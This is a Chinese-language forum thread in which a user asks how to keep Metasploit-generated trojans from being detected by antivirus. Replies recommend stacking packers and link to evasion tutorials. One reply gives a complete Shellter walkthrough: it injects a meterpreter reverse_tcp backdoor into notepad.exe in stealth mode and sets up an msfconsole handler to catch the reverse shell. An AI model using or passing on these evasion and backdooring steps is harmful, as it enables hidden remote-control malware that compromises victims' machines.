求 Linux马 免杀思路

自己在msf上面 生成的马老是被杀 试了很多办法还是不行 希望有大佬给点思路 可以另外悬赏 搬运工就算了

免杀的话就是多重加壳,用多个加壳工具,重复的加壳。这样可以减小被杀的可能,但是运行效率会有降低。

一. 配置ngrok准备内网穿透
二.进行木马的伪装与简单免杀
三.meterpreter后渗透功能测试

木马免杀看这里,https://blog.csdn.net/qq_41860876/article/details/105275823

1、你的具体是什么马 拿出来跑一跑
2、具体是什么杀毒软件 杀的 凶手是谁
3、提示信息是什么 拦截信息是什么

比较麻烦,我参考这个成功过:https://www.freebuf.com/sectool/166682.html

这些方法可以尝试一下,

apt-get update //更新一下
apt-get install shellter //直接apt在线安装
安装完成后 ,终端直接输入shellter打开会报错,根据提示 我们直接执行命令dpkg --add-architecture i386 && apt-get update && apt-get install wine32
打开shellter
shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。
Choose Operation Mode - Auto/Manual (A/M/H):A //选择模式 A 自动模式自动注入后门,M高级模式,H帮助
PE Target:/home/notepad.exe // 注入的程序 这里已windows系统自带的32位记事本程序举例
Enable Stealth Mode? (Y/N/H): Y //是否启用隐身模式 输入Y启用
Use a listed payload or custom? (L/C/H): L //使用攻击模块列表或者自定义? 输入L 选择Payload
Select payload by index: 1 //选择第一个
SET LHOST: 192.168.37.137 //设置反弹回来的IP 本机
SET LPORT:4444 //设置接收反弹的端口
打开msf,进行配置,
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost192.168.37.137set lport4444exploit //监听
这时运行带有后门的notepad.exe文件后,控制端成功连接上来,接下来就可以随意操作了。

看下这个链接不知道有用没
msf渗透测试小技巧之防止木马被杀
http://cn-sec.com/archives/247516.html

看看这个有用吗
http://cn-sec.com/archives/247516.html

https://mp.weixin.qq.com/s/A0CZslLh
给你一个链接你看看

木马免杀的几种方式:https://www.jianshu.com/p/e7da3a1790eb

占个沙发学习下。

码住占个沙发学习

这个网上有很多教程,不知道具体是哪里出了问题。

1、远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg

2、远控免杀专题(2)-msfvenom隐藏的参数:https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w

3、远控免杀专题(3)-msf自带免杀(VT免杀率35/69):https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA

4、远控免杀专题(4)-Evasion模块(VT免杀率12/71):https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ

5、远控免杀专题(5)-Veil免杀(VT免杀率23/71):https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw

6、远控免杀专题(6)-Venom免杀(VT免杀率11/71):https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ

https://blog.csdn.net/usertony/article/details/13020911?spm=1005.2026.3001.5635&utm_medium=distribute.pc_relevant_ask_down.none-task-blog-2~default~OPENSEARCH~Rate-4.pc_feed_download_top3ask&depth_1-utm_source=distribute.pc_relevant_ask_down.none-task-blog-2~default~OPENSEARCH~Rate-4.pc_feed_download_top3ask

https://blog.csdn.net/tony_whu/article/details/13020911